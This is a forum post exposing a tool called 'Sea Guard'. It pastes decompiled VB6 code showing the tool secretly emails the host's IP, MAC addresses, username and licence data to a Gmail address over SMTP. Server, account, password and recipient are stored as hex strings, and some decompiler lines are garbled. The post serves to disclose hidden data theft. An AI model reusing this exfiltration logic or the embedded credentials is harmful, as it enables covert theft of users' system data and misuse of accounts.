can know now what is Sea Guard ..
this hacked by me ,,
PHP Code:
Private sub Proc_31_0_5FB980
loc_005FB9A5: var_10 = &H402808
loc_005FBA5B: Proc_01460000(fs:[00h], edx, ecx)
loc_005FBA63: xchg esp, eax
loc_005FBA64: loop 5FBAA9h
loc_005FBA66: var_74AF7FBB = var_74AF7FBB + cl
loc_005FBA71: call edi(00000001h, edi, esi, ebx)
loc_005FBA81: call msvbvm60.dll.__vbaVarSetVar("", "")
loc_005FBA8D: call edi("", "CDO.Configuration", ebx)
loc_005FBA97: call msvbvm60.dll.__vbaVarSetVar("", "")
loc_005FBAA7: call msvbvm60.dll.__vbaVarLateMemCallLd("", "", "Fields", ebx)
loc_005FBAB5: call msvbvm60.dll.__vbaVarSetVar("", msvbvm60.dll.__vbaVarLateMemCallLd("", "", "Fields", ebx))
loc_005FBABF: var_70 = "687474703A2F2F736368656D61732E6D6963726F736F66742E636F6D2F63646F2F636F6E66696775726174696F6E2F"
loc_005FBAC9: Proc_005947B0(var_70, edx, ecx)
loc_005FBACE: var_78 = Proc_005947B0(var_70, edx, ecx)
loc_005FBAD6: var_80 = 8
loc_005FBADF: var_6C = Proc_005947B0(var_70, edx, ecx)
loc_005FBAEE: var_168 = "sendusing"
loc_005FBAF8: var_170 = 8
loc_005FBB03: var_188 = 2
loc_005FBB09: var_190 = 2
loc_005FBB24: var_80 = var_6C & 2
loc_005FBB74: call msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h)
loc_005FBB88: var_168 = "smtpserver"
loc_005FBB92: var_170 = 8
loc_005FBBA0: Proc_01460000(msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h), "736D74702E676D61696C2E636F6D", "")
If Proc_01460000(msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h), "736D74702E676D61696C2E636F6D", "") > var_4011AC Then GoTo loc_005FBB34
loc_005FBBAA: Proc_005947B0(Proc_01460000(msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h), "736D74702E676D61696C2E636F6D", ""), edx, ecx)
loc_005FBBAF: var_88 = Proc_005947B0(Proc_01460000(msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h), "736D74702E676D61696C2E636F6D", ""), edx, ecx)
loc_005FBBB5: var_90 = 8
loc_005FBBCA: var_80 = var_6C & Proc_005947B0(Proc_01460000(msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h), "736D74702E676D61696C2E636F6D", ""), edx, ecx)
loc_005FBC1A: call msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h)
loc_005FBC42: var_168 = "smtpserverport"
loc_005FBC4C: var_170 = 8
loc_005FBC52: var_188 = &H1D1
loc_005FBC5C: var_190 = 2
loc_005FBC75: var_80 = var_6C & &H1D1
loc_005FBCC5: call msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h)
loc_005FBCD3: var_168 = "smtpauthenticate"
loc_005FBCDD: var_170 = 8
loc_005FBCE3: var_188 = 1
loc_005FBCED: var_190 = 2
loc_005FBD06: var_80 = var_6C & 1
loc_005FBD56: call msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h)
loc_005FBD64: var_168 = "sendusername"
loc_005FBD6E: var_170 = 8
loc_005FBD7C: var_70 = "6A6D65726C696E2E69732E67617940676D61696C2E636F6D0D0A"
loc_005FBD86: Proc_005947B0(var_70, var_70, ecx)
loc_005FBD8B: var_88 = Proc_005947B0(var_70, var_70, ecx)
loc_005FBD91: var_90 = 8
loc_005FBDA6: var_80 = var_6C & Proc_005947B0(var_70, var_70, ecx)
loc_005FBDF6: call msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h)
loc_005FBE1E: var_168 = "sendpassword"
loc_005FBE28: var_170 = 8
loc_005FBE36: Proc_01460000(var_80, "646562696C343536", "")
If Not Asm.pe_flag Then GoTo loc_005FBDCA
loc_005FBE3D: ebp = esp - 1
loc_005FBE40: Proc_005947B0(Proc_01460000(var_80, "646562696C343536", ""), edx, ecx)
loc_005FBE4B: var_90 = 8
loc_005FBE60: var_80 = var_6C & Proc_005947B0(Proc_01460000(var_80, "646562696C343536", ""), edx, ecx)
loc_005FBEB0: call msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h)
loc_005FBEBC: Proc_01460000(msvbvm60.dll.__vbaVarLateMemCallSt("", "item", 00000001h), Proc_005947B0(Proc_01460000(var_80, "646562696C343536", ""), edx, ecx), "")
loc_005FBEC1: byte ptr var_FFFF8F6B = byte ptr var_FFFF8F6B And FFFFFFFFh
loc_005FBED8: var_168 = "smtpusessl"
loc_005FBEE2: var_170 = 8
loc_005FBEF2: var_190 = 2
loc_005FBF0B: var_80 = var_6C & 1
loc_005FBF5B: Proc_01460000(var_184, 1, "")
loc_005FBF6A: [eax] = [eax] + ch
If ecx = 0 Then GoTo loc_005FBFB2
loc_005FBF6F: var_AD3BAB = var_AD3BAB + cl
loc_005FBF75: adc eax, 0040111Ch
loc_005FBF7B: eax]+c.""
loc_005FBF8C: var_70 = "6A6B6F77616C393840676D61696C2E636F6D"
loc_005FBF96: Proc_005947B0(var_70, edx, ecx)
loc_005FBF9B: var_78 = Proc_005947B0(var_70, edx, ecx)
loc_005FBF9E: var_80 = 8
loc_005FBFC0: call msvbvm60.dll.__vbaVarLateMemSt("", "To", var_70, "item", 00000001h)
loc_005FBFDC: var_70 = "6A6D65726C696E2E69732E67617940676D61696C2E636F6D0D0A"
loc_005FBFE6: Proc_005947B0(var_70, var_70, ecx)
loc_005FBFEB: var_78 = Proc_005947B0(var_70, var_70, ecx)
loc_005FBFEE: var_80 = 8
loc_005FC010: call msvbvm60.dll.__vbaVarLateMemSt("", "From", var_70)
loc_005FC034: var_78 = "VRun" & "rupi"
loc_005FC037: var_80 = 8
loc_005FC059: call msvbvm60.dll.__vbaVarLateMemSt("", "Subject")
loc_005FC06C: var_70 = "677561726469616E"
loc_005FC076: Proc_005947B0(var_70, var_70, ecx)
loc_005FC07B: var_78 = Proc_005947B0(var_70, var_70, ecx)
loc_005FC07E: var_80 = 8
loc_005FC0A0: call msvbvm60.dll.__vbaVarLateMemSt("", "sender", var_70)
loc_005FC0B4: var_188 = "IP"
loc_005FC0C4: var_168 = 1
loc_005FC0CE: var_170 = 2
loc_005FC0DC: Proc_005FC510("", var_80, var_80)
loc_005FC0E6: var_198 = "13#1"
loc_005FC0EC: var_1A0 = 8
loc_005FC0F2: var_1A8 = "Adapters and mac adres"
loc_005FC0FC: var_1B0 = 8
loc_005FC102: var_1B8 = "13#1"
loc_005FC108: var_1C0 = 8
loc_005FC10E: Proc_005FCDA0(Proc_005FC510("", var_80, var_80), edx, ecx)
loc_005FC113: var_D8 = Proc_005FCDA0(Proc_005FC510("", var_80, var_80), edx, ecx)
loc_005FC119: var_E0 = 8
loc_005FC11F: var_1C8 = "13#1"
loc_005FC125: var_1D0 = 8
loc_005FC12B: var_1D8 = "UserName:"
loc_005FC135: var_1E0 = 8
loc_005FC13B: Proc_005FCA70(Proc_005FCDA0(Proc_005FC510("", var_80, var_80), edx, ecx), edx, ecx)
loc_005FC140: var_118 = Proc_005FCA70(Proc_005FCDA0(Proc_005FC510("", var_80, var_80), edx, ecx), edx, ecx)
loc_005FC146: var_120 = 8
loc_005FC14C: var_1E8 = "13#1"
loc_005FC152: var_1F0 = 8
loc_005FC158: var_1F8 = "LICENSE:"
loc_005FC162: var_200 = 8
loc_005FC168: var_208 = "rupi"
loc_005FC172: var_210 = 8
loc_005FC1B4: call msvbvm60.dll.__vbaVarIndexLoad(var_90, var_80, 00000001h, 8, var_80)
loc_005FC1C5: var_A0 = %StkVar3 & "rupi"
loc_005FC1D6: var_B0 = var_A0 & "rupi"
loc_005FC1E7: var_C0 = var_B0 & "rupi"
loc_005FC26F: var_160 = var_C0 & "rupi" & "rupi" & "rupi" & "rupi" & "rupi" & "rupi" & "rupi" & "rupi"
loc_005FC295: call msvbvm60.dll.__vbaVarLateMemSt("", "TextBody")
loc_005FC330: call msvbvm60.dll.__vbaVarLateMemStAd("", "Configuration", 00000000h, 0000000Fh, var_80, var_90, var_A0, var_B0, var_C0)
loc_005FC344: call msvbvm60.dll.__vbaObjVar("", "Send", 00000000h)
loc_005FC34B: msvbvm60.dll.__vbaObjVar("", "Send", 00000000h).%StkVar2
loc_005FC360: call msvbvm60.dll.__vbaVarSetObjAddref("", 00000000h)
loc_005FC368: call msvbvm60.dll.__vbaVarSetObjAddref("", 00000000h)
loc_005FC370: call msvbvm60.dll.__vbaVarSetObjAddref("", 00000000h)
loc_005FC372: call Exit Sub
loc_005FC37D: GoTo loc_005FC4B8
loc_005FC387: var_A8 = 80020004h
loc_005FC398: var_98 = 80020004h
loc_005FC39E: var_A0 = 10
loc_005FC3A4: var_88 = 80020004h
loc_005FC3AA: var_90 = 10
loc_005FC3B0: var_168 = "Cannot Connect Sea Guard, check your internet connection"
loc_005FC3BA: var_170 = 8
loc_005FC3EE: MsgBox "Cannot Connect Sea Guard, check your internet connection", 0
loc_005FC418: End
loc_005FC41E: call Exit Sub(10, 005FC4D3h)
loc_005FC429: GoTo loc_005FC4B8
loc_005FC4B7: Exit Sub
loc_005FC4B8:
End Sub
he send every thing about ur server (accounts ,etc)
from Sea Guard
what is that shit